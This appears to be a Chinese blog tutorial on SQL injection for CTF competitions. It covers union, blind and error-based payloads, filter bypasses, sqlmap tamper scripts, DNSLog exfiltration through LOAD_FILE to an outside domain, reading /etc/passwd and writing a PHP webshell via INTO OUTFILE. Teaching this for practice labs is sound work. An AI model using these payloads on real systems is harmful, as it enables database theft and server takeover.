2024 CTF Web SQL注入实战：从原理到高级绕过技巧

原创于 2026-06-26 10:10:40 发布 · 287 阅读

2 ·

本内容遵循CC 4.0 BY-SA版权协议

GEO检测

标签

#SQL注入 #CTF #Web安全

1. 项目概述：一份与时俱进的CTF Web SQL注入实战手册

如果你正在准备CTF比赛，或者想系统性地提升自己的Web安全实战能力，尤其是SQL注入这一块，那么你找对地方了。这份“2024年最新CTF Web SQL注入专项整理”不是什么官方教材，而是我结合了今年各大线上线下赛事的真题、靶场的新变化以及自己带新人时遇到的典型问题，梳理出来的一份“野战手册”。它的目标很明确：让你在面对五花八门的SQL注入题目时，能快速定位类型、构建有效Payload、绕过常见过滤，最终拿到那个梦寐以求的Flag。SQL注入作为Web安全的“元老级”漏洞，在CTF中从未缺席，但它的“玩法”每年都在升级，从简单的联合查询到盲注、报错注入，再到各种奇技淫巧的过滤绕过，甚至与新型框架、API的结合，都要求我们不断更新自己的武器库。这篇文章就是帮你完成这次武器库的年度升级，内容会持续更新，确保你看到的都是当前最有效、最前沿的思路和技巧。

2. SQL注入核心原理与CTF题型快速分类

在深入技巧之前，我们必须把地基打牢。SQL注入的本质，是攻击者通过构造特殊的输入，改变了后端数据库查询语句的原始逻辑。在CTF中，这通常表现为一个可控的输入点（如URL参数、表单字段、HTTP头），其值被直接拼接到了SQL语句中。

2.1 从源头理解注入点：数字型、字符型与搜索型

为什么CTF题目总爱问注入类型？因为类型直接决定了你Payload的“开头”。判断错误，整个攻击链就断了。

数字型注入 ：参数直接被用于数值计算或比较，通常没有引号包裹。例如： id=1 对应查询 SELECT * FROM articles WHERE id = 1 。测试方法很简单，提交 id=1 and 1=1 和 id=1 and 1=2 。如果前者正常返回，后者返回异常或为空，基本就是数字型。它的Payload构造最“干净”，不需要考虑闭合引号。
字符型注入 ：参数被单引号或双引号包裹。例如： name=admin 对应查询 SELECT * FROM users WHERE username = 'admin' 。这是最常见的类型。测试时，你需要先闭合前面的引号，再引入你的逻辑。例如提交 name=admin' and '1'='1 ，这会使查询变成 ...WHERE username = 'admin' and '1'='1' ，从而恒真。关键就在于那个“多余”的单引号，你需要用注释符（如 -- 、 # ）将其“处理掉”，避免语法错误。在MySQL中，常用 ' or 1=1 -- 来测试。
搜索型注入 ：常用于模糊查询，参数通常被 % 和引号包裹。例如： keyword=test 对应查询 SELECT * FROM products WHERE name LIKE '%test%' 。注入时，你需要先闭合前面的 %' ，再构造Payload，最后处理掉后面的 '% 。一个典型的测试Payload是： keyword=test%' and '1'='1 ，这会使查询变为 ...LIKE '%test%' and '1'='1%' 。

实操心得 ：很多新手会在这里卡住，因为页面回显不明确。一个黄金法则是： 先假设是字符型，用单引号 ' 去试探 。如果页面报错（显示了数据库错误信息），那恭喜你，不仅是字符型，还可能开启了错误回显，这为报错注入打开了大门。如果页面只是变得“不正常”（空白、布局错乱），那可能是字符型但错误被屏蔽了。如果页面完全没变化，再尝试数字型测试。Burp Suite的Intruder模块用Payload类型为“Sniper”，设置 ' 、 " 、 ' 、 1 and 1=1 、 1 and 1=2 这几个测试用例，能快速帮你判断。

2.2 CTF中SQL注入的四大核心考查形式

明白了注入点，接下来要看题目想考你什么“招式”。CTF中的SQL注入无外乎以下四种形式，每种都有对应的解题工具箱。

联合查询注入 ：这是最“经典”和“直观”的形式。前提是页面有正常的数据回显位置（比如文章标题、内容列表）。通过 UNION SELECT 将我们想查询的数据（如数据库名、表名、列名）合并到原始查询结果中，并显示在页面上。解题关键步骤：a) 判断列数（ ORDER BY ）；b) 判断回显点（ UNION SELECT 1,2,3... ）；c) 获取信息（ UNION SELECT database(), user(), version()... ）。在如 CTFshow Web入门 、 Pikachu 靶场的前期关卡中大量出现。
布尔盲注 ：页面没有直接的数据回显，但会根据SQL查询语句的真假（True/False）返回不同的页面状态（如“存在”与“不存在”、“正常”与“错误”）。你需要像猜谜一样，一位一位地猜测数据。例如，判断数据库名第一个字符的ASCII码是否大于100： id=1 and ascii(substr(database(),1,1))>100 。如果页面返回“正常”，说明大于100，否则小于等于100。通过二分法可以快速逼近准确值。这个过程极其繁琐，必须借助自动化工具（如sqlmap，或自己编写Python脚本）。
时间盲注 ：这是布尔盲注的“升级版”。页面无论查询真假，返回的状态都一模一样。此时，你需要通过让数据库执行“睡眠”命令，根据页面响应时间的差异来判断真假。Payload形如： id=1 and if(ascii(substr(database(),1,1))>100, sleep(3), 0) 。如果页面延迟了3秒左右返回，说明条件为真。这是最耗时的注入方式，完全依赖自动化。
报错注入 ：当网站开启了数据库错误回显（这是开发中的常见配置失误）时，我们可以故意构造一个会让数据库报错的语句，并将我们想查询的信息“夹带”在错误信息中返回。利用的函数如 updatexml() 、 extractvalue() 、 floor(rand()*2) 等。例如： id=1 and updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1) 。错误信息中就会包含数据库名。这种方式效率很高，无需猜测，直接读取。

3. 手工注入全流程拆解与实战演练

尽管sqlmap等自动化工具强大，但CTF中很多题目设置了过滤，或者需要你理解原理才能构造出正确的Payload。手工注入能力是根基。我们以一个虚拟的字符型注入点为例，假设URL为 http://ctf.example.com/news.php?id=1 ，且页面有文章标题和内容的回显。

3.1 第一步：侦察与信息收集

在发动任何攻击前，先当个“乖用户”。

正常访问 ：查看 id=1,2,3 时页面的变化，了解网站功能。
试探注入点 ：提交 id=1' 。如果页面报错（出现“You have an error in your SQL syntax...”之类），基本确定是字符型注入且错误可显。
判断数据库类型 ：不同数据库的语法和函数有差异。通过报错信息有时能直接看出（如MySQL, PostgreSQL）。也可以用特性函数判断：
- id=1' and version()>0 -- 如果正常，可能是MySQL（ version() 是MySQL函数）。
- id=1' and length('a')=1 -- 如果正常，可能是MySQL/SQLite（ length 函数）。
- 观察注释符： -- （MySQL）和 # （MySQL URL中需编码为 %23 ）通常指向MySQL； -- （PostgreSQL, SQL Server）。

3.2 第二步：确定列数与回显点

这是联合查询注入的必经之路。

使用 ORDER BY 猜解列数 ： ORDER BY 用于按列索引排序。我们从一个大数开始试错： id=1' ORDER BY 10 -- 。如果报错，说明没有10列。逐步减小数字： ORDER BY 5 , ORDER BY 3 ... 直到 ORDER BY 4 正常， ORDER BY 5 报错，那么查询结果就是4列。
寻找回显位置 ：使用 UNION SELECT 联合查询，但前提是前后SELECT的列数必须一致。构造Payload： id=-1' UNION SELECT 1,2,3,4 -- 。这里把原id设为-1或一个不存在的值，是为了让前一个查询结果为空，从而确保页面显示的是我们UNION查询出来的 1,2,3,4 。观察页面，原本显示文章标题和内容的地方，可能会被数字“2”和“3”替代。这两个位置就是我们可以利用的回显点。

3.3 第三步：系统信息获取与数据库结构探知

拿到了回显点（假设是第2、3列），我们就可以开始提取关键信息了。将Payload中的数字替换为数据库函数。

获取基础信息 ：
- id=-1' UNION SELECT 1, database(), user(), 4 -- （显示数据库名和当前用户）
- id=-1' UNION SELECT 1, version(), @@version_compile_os, 4 -- （显示数据库版本和操作系统）
爆出所有数据库名 ：在MySQL中，数据库信息存储在 information_schema.schemata 表里。
- id=-1' UNION SELECT 1, group_concat(schema_name), 3, 4 FROM information_schema.schemata -- 。 group_concat() 函数将多行结果合并成一个字符串，方便查看。你会发现除了系统库（如information_schema, mysql, performance_schema）外，还有一个或多个业务数据库，比如 ctfdb 。
爆出指定数据库的所有表名 ：假设目标数据库是 ctfdb ，表信息在 information_schema.tables 中。
- id=-1' UNION SELECT 1, group_concat(table_name), 3, 4 FROM information_schema.tables WHERE table_schema='ctfdb' -- 。你可能会得到 news,users,config 等表名。 users 表通常就是我们的终极目标。
爆出指定表的所有列名 ：目标表是 users ，列信息在 information_schema.columns 中。
- id=-1' UNION SELECT 1, group_concat(column_name), 3, 4 FROM information_schema.columns WHERE table_schema='ctfdb' AND table_name='users' -- 。结果可能是 id,username,password,email 。
最终一击：拖库获取Flag ：现在，数据库（ctfdb）、表（users）、列（username, password）都知道了。
- id=-1' UNION SELECT 1, group_concat(username, ':', password), 3, 4 FROM ctfdb.users -- 。这条语句会将用户名和密码用冒号连接后一并显示出来。Flag很可能就在某个用户的password字段里，或者就是username本身。

注意事项 ： group_concat() 有长度限制（默认1024字节）。如果数据太多显示不全，可以用 substr() 函数分段获取，或者使用 limit 子句逐个获取： ... UNION SELECT 1, username, password, 4 FROM ctfdb.users LIMIT 0,1 -- 。

4. 高级绕过技巧：应对CTF中的过滤与防御

现在的CTF题目不会让你简单地完成上述步骤。出题人会在中间设置各种“路障”，这就是考查你对SQL注入理解深度的地方。

4.1 常见关键词过滤与绕过

大小写绕过 ：如果过滤脚本只是简单匹配小写 select ，那么 SeLeCt 、 SELECT 就可能绕过。
双写绕过 ：如果过滤方式是删除关键词，如将 select 替换为空字符串。那么我们可以构造 selselectect ，当中间的 select 被删除后，两边的字符又拼接成了新的 select 。
编码绕过 ：
- URL编码 ： select 可以编码为 %73%65%6c%65%63%74 。但要注意，浏览器的地址栏或Burp Suite在发送请求时会自动解码一次，所以有时需要双重编码，或者直接在Burp Repeater的Hex视图里修改原始字节。
- 十六进制编码 ：将字符串转换为十六进制。例如， select 的十六进制是 0x73656c656374 。在SQL中， 0x 开头的值会被解释为十六进制字符串。Payload可以写成 UNION SELEC 0x73656c656374 1,2,3 （假设select被过滤，但SELEC没有）。更常用的是把表名、列名进行十六进制编码。 users -> 0x7573657273 。
- Unicode编码/HTML实体编码 ：在特定上下文（如输出到HTML）中可能有效。
等价函数/语句替换 ：
- and -> &&
- or -> ||
- = -> like , rlike , regexp (MySQL) 或 in()
- substr() -> substring() , mid() , left() , right()
- sleep() -> benchmark(10000000, md5('test')) （通过执行大量运算来延时）
注释符灵活运用 ： -- （后面有个空格）、 # （URL中需写为 %23 ）、 /*...*/ （内联注释）。有时 -- 会被过滤，但 # 或 /*!...*/ （MySQL特有的、会被执行的注释）仍可用。

4.2 空格过滤绕过

空格是SQL语句的分隔符，但过滤后我们可以用其他字符代替：

注释符代替 ： SELECT/**/username/**/FROM/**/users
括号：在特定上下文中，括号可以用于包裹参数，如 SELECT(username)FROM(users)WHERE(id=1)
换行符 ： %0a (LF), %0d (CR)，在HTTP请求中可以作为空格使用。
Tab符 ： %09
反引号 （MySQL）： SELECT username``FROM users （但需谨慎，反引号用于标识符，并非在所有位置都适用）。

4.3 引号过滤绕过

当表名或列名被引号包裹且引号被过滤时，我们可以尝试：

十六进制编码，如前所述。
如果数据库是MySQL，且开启了 magic_quotes 或类似特性（现已不常见），单引号会被转义为 \' 。此时可以考虑宽字节注入（如GBK编码），通过构造 %df' ，使 %df 和转义符 \ (%5c) 结合成一个合法的汉字，从而“吃掉”转义符，让后面的单引号逃逸。

4.4 实战案例：一个综合过滤的题目

假设题目过滤了 select , union , 空格 , = ，我们如何获取数据？

绕过select/union ：使用双写 selselectect 和 ununionion 。
绕过空格 ：使用 /**/ 。
绕过等号 ：使用 like 。
构造Payload ：原始Payload -1' union select 1,2,3 需要被改造。
- 首先，闭合引号： -1'
- 然后，使用双写的union和select，并用 /**/ 代替空格： ununionion/**/selselectect
- 由于 = 被过滤，我们判断列数不能用 ORDER BY 1 ，但可以用 ORDER BY 直接加数字（数字不需要等号），或者用 PROCEDURE ANALYSE() 等更复杂的方法。假设我们已知道是3列。
- 最终Payload可能类似： -1'/**/ununionion/**/selselectect/**/1,2,3# 。但这还不够，因为原查询可能还有条件。更完整的可能是： -1'/**/ununionion/**/selselectect/**/1,database(),3# ，用 like 比较： -1'/**/or/**/database()/**/like/**/'ctf%'# 来验证数据库名。

这个过程非常考验耐心和思维灵活性，需要不断尝试和组合各种绕过技巧。

5. 工具辅助与自动化：让sqlmap成为你的利器

手工注入是基础，但在时间紧张的CTF比赛或面对盲注时，自动化工具必不可少。sqlmap是绝对的主力。但很多人只是简单地 sqlmap -u “URL” ，这远远不够。

5.1 sqlmap高效使用心法

精准定位注入点 ：如果注入点在Cookie或User-Agent头，需要用 --cookie 或 --user-agent 参数，并用 * 标记注入点。例如： sqlmap -u "http://target.com/news.php" --cookie "id=1*" --level 2 。 --level 参数提高测试等级，会检查更多的注入点和头部。
指定数据库类型 ：如果你已经判断出是MySQL，直接用 --dbms=mysql 可以大幅提高检测效率。
处理复杂的过滤与防护 ：
- --tamper 参数是神器。它允许你使用脚本对Payload进行混淆、编码，以绕过WAF/过滤。sqlmap自带很多tamper脚本，如 space2comment.py （空格转注释）、 between.py （用 between 替换 > 和 < ）、 charencode.py （URL编码）。你可以根据题目过滤情况组合使用： --tamper=space2comment,between 。
- 如果遇到动态令牌（如每次请求需要不同的CSRF token），可以结合Burp Suite。先用Burp抓取一个有效请求，保存为 request.txt 文件，然后用 sqlmap -r request.txt 来加载，sqlmap会自动处理会话和令牌。
盲注优化 ：对于时间盲注，默认的 --time-sec 是5秒，太慢了。如果你网络环境好，可以设置为2秒： --time-sec=2 。同时使用 --threads=10 增加线程数，并行猜测字符，能极大提升速度。
只获取关键信息 ：不要一上来就 --dump-all （拖整个库）。先 --dbs 看数据库，再 -D target_db --tables 看表，再 -D target_db -T users --columns 看列，最后 -D target_db -T users -C username,password --dump 只取需要的列。这样既快又不会产生大量流量引起注意。

5.2 编写自己的tamper脚本

当内置的tamper脚本都无法绕过时，你需要自己写。一个简单的tamper脚本就是一个Python文件，里面有一个 tamper(payload, **kwargs) 函数。例如，题目把 select 替换成空，我们可以写一个双写绕过的脚本：

#!/usr/bin/env python
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = retVal.replace("SELECT", "SELSELECTECT")
        retVal = retVal.replace("UNION", "UNUNIONION")
        # 可以添加更多替换规则
    return retVal

保存为 doublewrite.py ，使用 --tamper=doublewrite 加载即可。

踩坑记录 ：sqlmap的 --random-agent 功能很好用，可以随机切换User-Agent来避免被屏蔽。但在一些对请求头顺序有奇怪校验的题目里，它可能会破坏请求结构导致失败。如果发现使用 --random-agent 后请求异常，建议关闭它，使用一个固定的、常见的UA。

6. CTF SQL注入真题场景与特殊技巧剖析

结合最新的比赛和靶场趋势，我梳理了几个值得深入研究的场景。

6.1 二次注入与过滤逻辑漏洞

这不是一种注入类型，而是一种利用场景。数据第一次插入数据库时被安全地转义了，但后来从库中取出再次用于SQL查询时，却没有被转义。例如，一个注册功能，用户名 admin' -- 被转义后存入数据库为 admin\' -- 。但网站有一个“修改签名”的功能，会从数据库读取用户名并拼接到更新语句中： UPDATE users SET signature='...' WHERE username='从数据库读出的用户名' 。此时读出的用户名是转义前的 admin' -- ，直接拼接就造成了注入。解题关键在于找到“存入-取出-再使用”的数据流。在CTF中，常与用户注册、留言、修改资料等功能点结合。

6.2 堆叠注入与多语句执行

堆叠注入是指通过分号 ; 在一行内执行多条SQL语句。是否支持取决于数据库接口（如PHP的 mysqli_multi_query ）。Payload形如： id=1'; UPDATE users SET password='hacked' WHERE username='admin' -- 。在CTF中，这常被用来“留后门”或进行更复杂的操作。但很多现代数据库驱动默认禁止多语句查询，所以并不常见。如果支持，它的威力巨大。

6.3 利用DNSLog外带数据解决无回显注入

这是近年来非常流行的高级技巧，适用于无回显的盲注，且能极大提高数据获取速度。原理是：让数据库发起一个DNS查询，查询的域名中包含了我们想窃取的数据。因为DNS请求会经过网络，我们可以通过监控我们拥有的域名（如ceye.io, dnslog.cn提供的子域名）的解析日志，来获取数据。例如在MySQL中，可以利用 load_file() 函数发起请求： SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.your-subdomain.ceye.io\\abc')) 。当数据库执行此语句时，会尝试访问 \\数据库名.your-subdomain.ceye.io\abc 这个UNC路径（在Windows下），这实际上会发起一个对 数据库名.your-subdomain.ceye.io 的DNS查询。我们在ceye.io的后台就能看到这个查询记录，从而知道数据库名。这种方法比时间盲注快几个数量级。

6.4 SQL注入与文件操作：读写文件获取Shell

在数据库权限足够高（如root用户）且配置允许（ secure_file_priv 为空）的情况下，SQL注入可以读写服务器文件。

读文件 ： UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3,4 。这常用于读取源码（ /var/www/html/index.php ）、配置文件（包含数据库密码）或Flag文件。
写文件 ： SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php' 。这可以直接写入一个Webshell，从而获取服务器控制权。这是CTF中Web题的常见终极手段。但要注意，需要知道网站的绝对路径，并且目录有写权限。

7. 实战问题排查与技巧速查手册

在实际解题过程中，你会遇到各种奇怪的问题。这里记录一些高频问题的排查思路。

7.1 为什么我的联合查询不显示数据？

列数不对 ：这是最常见的原因。务必用 ORDER BY 精确判断列数。
前后查询列数据类型不匹配 ： UNION 要求前后对应列的数据类型兼容。如果你在原本显示字符串的位置放了个数字 1 ，可能没问题（数据库会做隐式转换）。但反过来，在数字位放字符串可能失败。尝试将Payload中的位置互换： UNION SELECT 1,2,3 不行就试试 UNION SELECT 'a','b','c' 。
原查询结果不为空 ：如果 id=1 有数据，那么 UNION SELECT 的结果会附加在后面，可能因为页面只显示第一条而看不到。所以一定要让原查询结果为空，使用 id=-1 或 id=999999 或 id=1 and 1=2 。
有额外的WHERE条件或LIMIT ：页面可能只显示一部分数据。尝试在UNION查询后也加上 LIMIT 1 ，或者用子查询包裹。

7.2 时间盲注页面响应时间不稳定怎么办？

设置更长的睡眠时间 ：将 sleep(2) 改为 sleep(5) ，让时间差异更明显。
使用BENCHMARK函数 ： BENCHMARK(10000000, MD5('test')) 通过执行大量计算来制造延迟，可能比 sleep() 更稳定，因为 sleep() 函数在某些环境下可能被禁用。
多次请求取平均值 ：写脚本时，对于每个判断点，发送3-5次请求，计算平均响应时间，以减少网络波动的影响。
检查WAF或中间件延迟 ：有些防护设备会对异常请求引入随机延迟干扰判断。需要观察规律，或者尝试不同的Payload特征，看哪种延迟最稳定。

7.3 使用sqlmap时遇到“连接被重置”或“超时”

降低请求频率 ：添加参数 --delay=1 （每次请求间隔1秒）和 --timeout=15 （超时时间设为15秒）。
使用随机代理 ： --proxy=http://代理IP:端口 ，或者使用 --proxy-file 指定代理列表。
调整Level和Risk ：过高的Level和Risk会测试更多攻击向量，可能触发防护。从默认的Level 1/Risk 1开始。
关闭不必要的Payload测试 ：如果确定是时间盲注，可以用 --technique=T 只测试时间盲注，减少请求量。

7.4 如何快速在源码或响应中查找Flag？

CTF的Flag格式通常有规律，如 flag{...} 、 CTF{...} 、 KEY{...} ，或者是一段特殊的MD5、SHA1字符串。

浏览器搜索 ：在渲染后的页面和查看的源代码中，直接按 Ctrl+F 搜索 flag{ 、 CTF 、 KEY 。
Burp Suite搜索 ：在Proxy的历史记录或Repeater的响应中，使用 Ctrl+F 在“Search”栏选择“Find in response”，输入正则表达式，如 flag\{.*?\} 或 [A-Fa-f0-9]{32} （MD5）。
sqlmap直接正则提取 ：sqlmap的 --regexp 参数可以指定正则表达式，直接从返回数据中提取Flag。例如： sqlmap -u "..." --regexp="flag\{.*?\}" 。这在你拖取大量数据时非常有用，能自动定位Flag。

最后，保持更新至关重要。Web安全技术日新月异，新的框架、新的漏洞利用方式、新的过滤和绕过技巧不断出现。多打靶场（如DVWA, Pikachu, SQLi-Labs, PortSwigger的Web Security Academy），多参加实战比赛，多看优秀的Writeup，并把你的收获补充到自己的知识体系中，这才是从“知道”到“精通”的唯一路径。这份整理也会随着我的学习和实战，不断加入新的内容。